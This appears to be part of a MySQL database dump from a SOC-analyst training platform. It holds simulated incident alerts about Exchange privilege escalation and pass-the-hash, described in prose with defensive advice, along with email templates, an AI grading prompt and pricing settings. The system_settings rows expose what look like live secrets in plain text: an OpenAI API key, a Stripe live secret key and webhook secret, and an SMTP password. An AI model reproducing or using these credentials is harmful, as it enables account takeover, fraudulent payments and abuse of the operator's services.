(311, 59, 598, 3, 'Privilege Escalation Attempt Detected', '## Overview\n\nThe adversary has exploited **CVE-2021-34523** for privilege escalation, gaining SYSTEM-level access on the compromised Exchange server.\n\n## Technical Details\n- **Exploit Tool Used**: PrivEsc v2.0\n- **Privileges Gained**: SYSTEM\n\n## Recommendations\n- Review and restrict service account permissions.\n- Enhance monitoring on privileged account activities.\n\n## Next Steps\nAnticipate lateral movement attempts as adversaries seek to expand their foothold within the network.', '2026-01-08 22:15:20'),
(312, 59, 599, 4, 'Lateral Movement Strategy', '## Overview\n\nLateral movement activities have been identified, indicating the adversary\'s intent to expand their presence within the network.\n\n## Observed Tactics\n- **Technique**: Pass-the-Hash\n- **Targeted Systems**: File servers and domain controllers\n\n## Recommendations\n- Implement SMB signing and limit NTLM use.\n- Monitor network traffic for anomalous patterns.\n\n## Next Steps\nPrepare for potential data exfiltration efforts, focusing on monitoring unusual data transfer channels.', '2026-01-08 22:15:20'),
(313, 59, 600, 5, NULL, NULL, '2026-01-08 22:15:20');

-- --------------------------------------------------------

--
-- Table structure for table `password_resets`
--

DROP TABLE IF EXISTS `password_resets`;
CREATE TABLE `password_resets` (
  `id` int(11) NOT NULL,
  `email` varchar(255) NOT NULL,
  `token` varchar(255) NOT NULL,
  `created_at` datetime DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `system_settings`
--

DROP TABLE IF EXISTS `system_settings`;
CREATE TABLE `system_settings` (
  `key` varchar(255) NOT NULL,
  `value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `category` varchar(50) DEFAULT NULL,
  `updated_at` datetime DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `system_settings`
--

INSERT INTO `system_settings` (`key`, `value`, `category`, `updated_at`) VALUES
('account_deleted_body', '\"<h1>Account Deleted</h1><p>Hi {{name}},</p><p>Your account has been successfully deleted from InfoSec Labs. We are sorry to see you go.</p>\"', 'email_template', '2026-01-08 01:09:51'),
('account_deleted_subject', '\"Account Deleted\"', 'email_template', '2026-01-08 01:09:51'),
('account_locked_body', '\"<h1>Account Locked</h1><p>Hi {{name}},</p><p>Your account has been locked due to multiple failed login attempts. Please contact support or try again later.</p>\"', 'email_template', '2026-01-08 01:09:51'),
('account_locked_subject', '\"Your Account has been Locked\"', 'email_template', '2026-01-08 01:09:51'),
('ai_admin_approval', '\"false\"', 'ai_integration', '2026-01-08 01:09:51'),
('ai_alert_count', '\"2\"', 'ai_integration', '2026-01-08 01:09:51'),
('ai_alert_frequency', '\"12hours\"', 'ai_integration', '2026-01-08 01:09:51'),
('ai_api_key', '\"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\"', 'ai_integration', '2026-01-08 01:09:51'),
('ai_auto_gen_enabled', 'false', 'ai_integration', '2026-01-08 01:09:51'),
('ai_distribution_hours', '\"12\"', 'ai_integration', '2026-01-08 01:09:51'),
('ai_evaluation_enabled', '\"true\"', 'ai_integration', '2026-01-08 01:09:51'),
('ai_prompt', '\"You are a Professional SOC Analyst and Mentor at a high-security Security Operations Center.\\nYour task is to review and grade a junior analyst\'s investigation report for a security alert.\\n\\n### ALERT CONTEXT\\nTitle: {{title}}\\nSeverity: {{severity}}\\nDescription: {{details}}\\nIs Real World Example: {{example}}\\n\\n### ANALYST SUBMISSION\\nVerdict: {{verdict}}\\nAnalysis: {{analysis}}\\nSteps Taken: {{steps}}\\nConclusion: {{conclusion}}\\n\\n### EVALUATION CRITERIA\\n1. Verdict Accuracy (CRITICAL): Did the analyst correctly identify the true nature of the alert (True Positive vs False Positive)?\\n2. Analysis Depth: Did they interpret the raw logs correctly? Did they find the root cause?\\n3. Remediation: Were the steps taken (e.g., blocking IPs, isolating hosts, resetting passwords) appropriate for the severity?\\n4. Communication: Is the conclusion clear, professional, and actionable?\\n\\n### YOUR OUTPUT\\nYou must respond with valid JSON ONLY. Do not use Markdown formatting (like ```json).\\n\\n{\\n  \\\"grade\\\": <integer between 0 and 100>,\\n  \\\"feedback\\\": \\\"<Constructive, professional feedback addressed to the analyst. improved analysis tips.>\\\",\\n  \\\"ai_summary\\\": {\\n    \\\"verdict\\\": \\\"<The Correct Verdict>\\\",\\n    \\\"analysis\\\": \\\"<Expert technical analysis of what actually occurred in this alert>\\\",\\n    \\\"steps\\\": \\\"<The ideal remediation steps that should have been taken>\\\",\\n    \\\"conclusion\\\": \\\"<A concise executive summary suitable for management>\\\"\\n  }\\n}\"', 'ai_integration', '2026-01-08 01:09:51'),
('ai_provider', '\"openai\"', 'ai_integration', '2026-01-08 01:09:51'),
('ai_strategy', '\"random\"', 'ai_integration', '2026-01-08 01:09:51'),
('alert_assigned_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <div class=\\\"logo\\\">InfoSec<span>Labs</span></div> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">New Incident Assigned</h1> <p>Hello <strong>{{name}}</strong>,</p> <p>A new security incident has been flagged and assigned to you for immediate analysis.</p> <div class=\\\"card\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px; uppercase;\\\">Incident Details</p> <h3 style=\\\"margin:5px 0; color:#fff; font-size:18px;\\\">{{title}}</h3> <p style=\\\"margin:0; color:#b026ff; font-weight:bold;\\\">Status: Pending Investigation</p> </div> <p>Review logs and submit your verdict.</p> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/dashboard\\\" class=\\\"button\\\">Start Investigation</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-01-11 18:10:54'),
('alert_assigned_subject', '\"New Mission: {{title}}\"', 'email_template', '2026-01-11 18:10:54'),
('articles', '\"[{\\\"source\\\":\\\"SecurityWeek\\\",\\\"title\\\":\\\"Kimwolf Android Botnet Grows Through Residential Proxy Networks\\\",\\\"link\\\":\\\"https://www.securityweek.com/kimwolf-android-botnet-grows-through-residential-proxy-networks/\\\",\\\"date\\\":\\\"2026-01-05T09:48:08.000Z\\\",\\\"description\\\":\\\"\\\\nThe 2-million-device-strong botnet allows monetization through DDoS attacks, app installs, and the selling of proxy bandwidth.\\\\nThe post Kimwolf Android Botnet Grows Through Residential Proxy Networks appeared first on SecurityWeek.\\\\n\\\",\\\"image\\\":null,\\\"tldr\\\":\\\"\\\\nThe 2-million-device-strong botnet allows monetization through DDoS attacks, app installs, and the ...\\\"},{\\\"source\\\":\\\"SecurityWeek\\\",\\\"title\\\":\\\"Researcher Spotlights WhatsApp Metadata Leak as Meta Begins Rolling Out Fixes\\\",\\\"link\\\":\\\"https://www.securityweek.com/researcher-spotlights-whatsapp-metadata-leak-as-meta-begins-rolling-out-fixes/\\\",\\\"date\\\":\\\"2026-01-05T09:01:59.000Z\\\",\\\"description\\\":\\\"\\\\nWhatsApp device fingerprinting can be useful in the delivery of sophisticated spyware, but impact is very limited without a zero-day.\\\\nThe post Researcher Spotlights WhatsApp Metadata Leak as Meta Begins Rolling Out Fixes appeared first on SecurityWeek.\\\\n\\\",\\\"image\\\":null,\\\"tldr\\\":\\\"\\\\nWhatsApp device fingerprinting can be useful in the delivery of sophisticated spyware, but impact i...\\\"},{\\\"source\\\":\\\"Schneier on Security\\\",\\\"title\\\":\\\"Telegram Hosting World’s Largest Darknet Market\\\",\\\"link\\\":\\\"https://www.schneier.com/blog/archives/2026/01/telegram-hosting-worlds-largest-darknet-market.html\\\",\\\"date\\\":\\\"2026-01-05T09:01:16.000Z\\\",\\\"description\\\":\\\"\\\\nWired is reporting on Chinese darknet markets on Telegram.\\\\nThe ecosystem of marketplaces for Chinese-speaking crypto scammers hosted on the messaging service Telegram have now grown to be bigger than ever before, according to a new analysis from the crypto tracing firm Elliptic. Despite a brief dro\\\",\\\"image\\\":null,\\\"tldr\\\":\\\"\\\\nWired is reporting on Chinese darknet markets on Telegram.\\\\nThe ecosystem of marketplaces for Chines...\\\"},{\\\"source\\\":\\\"The Hacker News\\\",\\\"title\\\":\\\"The State of Cybersecurity in 2025: Key Segments, Insights, and Innovations \\\",\\\"link\\\":\\\"https://thehackernews.com/2026/01/the-state-of-cybersecurity-in-2025key.html\\\",\\\"date\\\":\\\"2026-01-05T08:55:00.000Z\\\",\\\"description\\\":\\\"Featuring:\\\\n\\\\nCybersecurity is being reshaped by forces that extend beyond individual threats or tools. As organizations operate across cloud infrastructure, distributed endpoints, and complex supply chains, security has shifted from a collection of point solutions to a question of architecture, trust\\\",\\\"image\\\":\\\"https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA8x4yWhFnltxystR8dz6wTJZo-s-V59gxVDdhogzQnCBOGTU8Rl8SzY-Qa9q83pzJfuShODB0oiNiImplzMoWmBgY754RhzQLWWutipMGuqbhZMyGTQKGsHQEqAOsdiZ2F6FHASN947iuZczpw47T46GJy6juP0qa4739u4U_1-S9yahO6ma6VI_ttIM/s1600/papryon.jpg\\\",\\\"tldr\\\":\\\"Featuring:\\\\n\\\\nCybersecurity is being reshaped by forces that extend beyond individual threats or tools...\\\"},{\\\"source\\\":\\\"The Hacker News\\\",\\\"title\\\":\\\"Bitfinex Hack Convict Ilya Lichtenstein Released Early Under U.S. First Step Act\\\",\\\"link\\\":\\\"https://thehackernews.com/2026/01/bitfinex-hack-convict-ilya-lichtenstein.html\\\",\\\"date\\\":\\\"2026-01-05T06:42:00.000Z\\\",\\\"description\\\":\\\"Ilya Lichtenstein, who was sentenced to prison last year for money laundering charges in connection with his role in the massive hack of cryptocurrency exchange Bitfinex in 2016, said he has been released early.\\\\nIn a post shared on X last week, the 38-year-old announced his release, crediting U.S. P\\\",\\\"image\\\":\\\"https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRjeSAB0rkk2lglAZ8hgVe7QDPCxycsYNyYdH-GgUX4XyDU2mGl_iQ2uOtMu8ShG5OlzZ-ds7crBTv8Orc9nSe-JMycT7ukvHmQ-yEmXZPSwkhY8DlnPvfag3d0RdJ6fPAV_baXOgwpvJefpvO08HzmLNZF13f5d9oL63dXTTBS72P_2lg0lsaEJCQx82C/s1600/bitfinex-case.jpg\\\",\\\"tldr\\\":\\\"Ilya Lichtenstein, who was sentenced to prison last year for money laundering charges in connection ...\\\"}]\"', 'newsletter', '2026-01-08 01:09:51'),
('award_gold_body', '\"<h1>🏆 Gold Award Earned!</h1><p>Hi {{name}},</p><p>Congratulations on your outstanding performance! You have been awarded the Gold Analyst Badge.</p>\"', 'email_template', '2026-01-08 01:09:51'),
('award_gold_subject', '\"Congratulations! You earned a Gold Award\"', 'email_template', '2026-01-08 01:09:51'),
('award_won_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <div class=\\\"logo\\\">InfoSec<span>Labs</span></div> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Achievement Unlocked</h1> <div style=\\\"text-align: center; margin-bottom: 20px;\\\"> <div style=\\\"font-size: 64px;\\\">🏆</div> </div> <p style=\\\"text-align: center; font-size: 18px;\\\">Congratulations, <strong>{{name}}</strong>!</p> <p style=\\\"text-align: center;\\\">You have earned the <strong>{{awardType}} Tier Analyst</strong> award.</p> <div class=\\\"card\\\" style=\\\"border-left-color: #f59e0b; text-align: center;\\\"> <p style=\\\"color: #fff;\\\">This badge has been added to your profile as a testament to your elite status.</p> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/profile\\\" class=\\\"button\\\" style=\\\"background: linear-gradient(135deg, #f59e0b 0%, #d97706 100%); box-shadow: 0 4px 15px rgba(245, 158, 11, 0.4);\\\">View Profile</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-01-11 18:10:54'),
('award_won_subject', '\"Achievement Unlocked: {{awardType}} Award\"', 'email_template', '2026-01-11 18:10:54'),
('build_id', '\"1767031585\"', 'version', '2026-01-08 01:09:51'),
('day', '\"friday\"', 'newsletterSchedule', '2026-01-08 01:09:51'),
('default_threat_map', '\"https://livethreatmap.radware.com\"', 'general', '2026-01-08 01:09:51'),
('discount_monthly_percent', '\"25\"', 'payment', '2026-01-08 01:09:51'),
('discount_yearly_percent', '\"25\"', 'payment', '2026-01-08 01:09:51'),
('email_from_address', '\"noreply@infoseclabs.io\"', 'email', '2026-01-08 01:09:51'),
('email_smtp_host', '\"\"', 'email', '2026-01-08 01:09:51'),
('email_smtp_pass', '\"\"', 'email', '2026-01-08 01:09:51'),
('email_smtp_port', '\"587\"', 'email', '2026-01-08 01:09:51'),
('email_smtp_user', '\"\"', 'email', '2026-01-08 01:09:51'),
('enabled', 'false', 'newsletterSchedule', '2026-01-08 01:09:51'),
('free_tier_limit', '\"3\"', 'general', '2026-01-08 01:09:51'),
('giveaway', '\"{\\\"last_winner_id\\\":34,\\\"last_winner_name\\\":\\\"Jacob Myfield\\\",\\\"last_awarded_at\\\":\\\"2026-01-01T21:15:34.862Z\\\",\\\"award_type\\\":\\\"gold\\\"}\"', NULL, '2026-01-08 01:09:51'),
('google_analytics_id', '\"G-L24HQ8D3ZW\"', 'general', '2026-01-08 01:09:51'),
('hide_tiers', 'false', 'payment', '2026-01-08 01:09:51'),
('hour', '\"9\"', 'newsletterSchedule', '2026-01-08 01:09:51'),
('investigation_graded_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <div class=\\\"logo\\\">InfoSec<span>Labs</span></div> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Performance Review</h1> <p>Your investigation report for <strong>{{title}}</strong> has been audited.</p> <div style=\\\"background-color: #131416; border: 1px solid #333; border-radius: 8px; padding: 20px; text-align: center; margin: 20px 0;\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px; text-transform:uppercase; letter-spacing:1px;\\\">Final Grade</p> <h2 style=\\\"margin:10px 0; font-size:48px; color: #{{gradeColor}};\\\">{{grade}}</h2> </div> <div class=\\\"card\\\" style=\\\"border-left: 4px solid #{{gradeColor}};\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px;\\\">Auditor Feedback</p> <p style=\\\"margin:5px 0 0 0; color:#fff; font-style:italic;\\\">\\\"{{feedback}}\\\"</p> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/dashboard\\\" class=\\\"button\\\">View Full Details</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-01-11 18:10:54'),
('investigation_graded_subject', '\"Report Graded: {{title}}\"', 'email_template', '2026-01-11 18:10:54'),
('newsletter_day', '\"monday\"', NULL, '2026-01-08 01:09:51'),
('newsletter_enabled', '\"1\"', NULL, '2026-01-08 01:09:51'),
('newsletter_hour', '\"7\"', NULL, '2026-01-08 01:09:51'),
('password_reset_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <div class=\\\"logo\\\">InfoSec<span>Labs</span></div> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Password Reset Protocol</h1> <p>We received a request to reset the credentials for your account.</p> <div class=\\\"card\\\" style=\\\"border-left-color: #fca5a5;\\\"> <p style=\\\"margin:0; color:#f87171; font-weight:bold;\\\">Expiration Warning</p> <p style=\\\"margin:5px 0 0 0; color:#fff;\\\">This secure link expires in 60 minutes.</p> </div> <p>If you did not initiate this request, immediate perimeter checks are recommended.</p> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{link}}\\\" class=\\\"button\\\" style=\\\"background: linear-gradient(135deg, #ef4444 0%, #b91c1c 100%); box-shadow: 0 4px 15px rgba(239, 68, 68, 0.4);\\\">Reset Password</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-01-11 18:10:54'),
('password_reset_subject', '\"Security Alert: Password Reset Request\"', 'email_template', '2026-01-11 18:10:54'),
('plan_free_name', '\"Free Tier\"', 'payment', '2026-01-08 01:09:51'),
('plan_monthly_name', '\"Monthly Pro\"', 'payment', '2026-01-08 01:09:51'),
('plan_yearly_name', '\"Yearly Pro\"', 'payment', '2026-01-08 01:09:51'),
('price_free', '\"0\"', 'payment', '2026-01-08 01:09:51'),
('price_monthly', '\"19.99\"', 'payment', '2026-01-08 01:09:51'),
('price_yearly', '\"199.99\"', 'payment', '2026-01-08 01:09:51'),
('registration_enabled', '\"true\"', 'general', '2026-01-08 01:09:51'),
('reset_password_body', '\"<h1>Password Reset Request</h1><p>You requested to reset your password. Click the link below to proceed:</p><p><a href=\\\"{{url}}\\\">Reset Password</a></p><p>If you did not request this, please ignore this email.</p>\"', 'email_template', '2026-01-08 01:09:51'),
('reset_password_subject', '\"Reset your InfoSec Labs Password\"', 'email_template', '2026-01-08 01:09:51'),
('site_title', '\"InfoSecLabs\"', 'general', '2026-01-08 01:09:51'),
('smtp_host', '\"mail.infoseclabs.io\"', 'email', '2026-01-08 01:09:51'),
('smtp_pass', '\"Konyalim82@\"', 'email', '2026-01-08 01:09:51'),
('smtp_port', '\"587\"', 'email', '2026-01-08 01:09:51'),
('smtp_user', '\"noreply@infoseclabs.io\"', 'email', '2026-01-08 01:09:51'),
('stripe_price_display_monthly', '\"$11.24\"', 'payment', '2026-01-08 01:09:51'),
('stripe_price_display_yearly', '\"$112.48\"', 'payment', '2026-01-08 01:09:51'),
('stripe_price_monthly', '\"price_1Sn4wNL5VKtXn66bfKqWHcTw\"', 'payment', '2026-01-08 01:09:51'),
('stripe_price_original_monthly', '\"14.98\"', 'payment', '2026-01-08 01:09:51'),
('stripe_price_original_yearly', '\"149.98\"', 'payment', '2026-01-08 01:09:51'),
('stripe_price_yearly', '\"price_1Sn4wOL5VKtXn66b7T6oftiS\"', 'payment', '2026-01-08 01:09:51'),
('stripe_publishable_key', '\"pk_live_51QQtYrL5VKtXn66boiqeGpfhs7jYgGOERnWlxNwjTYtFuigU04AdXl0CnFhH0FLBUNo6MVAjPLACpXcYjgJuY3BU00ViZYgEBE\"', 'payment', '2026-01-08 01:09:51'),
('stripe_secret_key', '\"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\"', 'payment', '2026-01-08 01:09:51'),
('stripe_webhook_secret', '\"whsec_TTJgpSwgkcQFwNyM7IKkrodE2aTTSL8H\"', 'payment', '2026-01-08 01:09:51'),
('subscriber_count', '\"30\"', 'newsletter', '2026-01-08 01:09:51'),
('subscription_upgraded_body', '\"<h1>Welcome to Pro!</h1><p>Hi {{name}},</p><p>Your account has been successfully upgraded to the Pro plan. Enjoy access to all premium features!</p>\"', 'email_template', '2026-01-08 01:09:51'),
('subscription_upgraded_subject', '\"Subscription Upgraded to Pro\"', 'email_template', '2026-01-08 01:09:51'),
('support_email', '\"support@infoseclabs.io\"', 'general', '2026-01-08 01:09:51'),
('system_email', '\"noreply@infoseclabs.io\"', 'general', '2026-01-08 01:09:51'),
('testEmail', '\"\"', 'newsletter', '2026-01-08 01:09:51'),
('timestamp', '\"2025-12-29T18:06:25Z\"', 'version', '2026-01-08 01:09:51'),
('verification_body', '\"<h1>Welcome to InfoSec Labs!</h1><p>Please verify your email address by clicking the link below:</p><p><a href=\\\"{{url}}\\\">Verify Email</a></p>\"', 'email_template', '2026-01-08 01:09:51'),
('verification_subject', '\"Verify your InfoSec Labs Account\"', 'email_template', '2026-01-08 01:09:51'),
('verify_email_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <div class=\\\"logo\\\">InfoSec<span>Labs</span></div> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Verify Your Account</h1> <p>Welcome, Analyst.</p> <p>To initialize your secure workspace and begin your training simulations, you must verify this communication channel.</p> <div class=\\\"card\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px; text-transform:uppercase;\\\">Action Required</p> <p style=\\\"margin:5px 0 0 0; color:#fff;\\\">Click the button below to activate your clearance.</p> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{link}}\\\" class=\\\"button\\\">Verify Email</a> </div> <p style=\\\"font-size: 12px; color: #666; margin-top: 30px;\\\">Direct uplink: <br><a href=\\\"{{link}}\\\" style=\\\"color: #666;\\\">{{link}}</a></p> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-01-11 18:10:54'),
('verify_email_subject', '\"Action Required: Verify Your Identity\"', 'email_template', '2026-01-11 18:10:54'),
('version', '\"1.0.1767031585\"', 'version', '2026-01-08 01:09:51'),
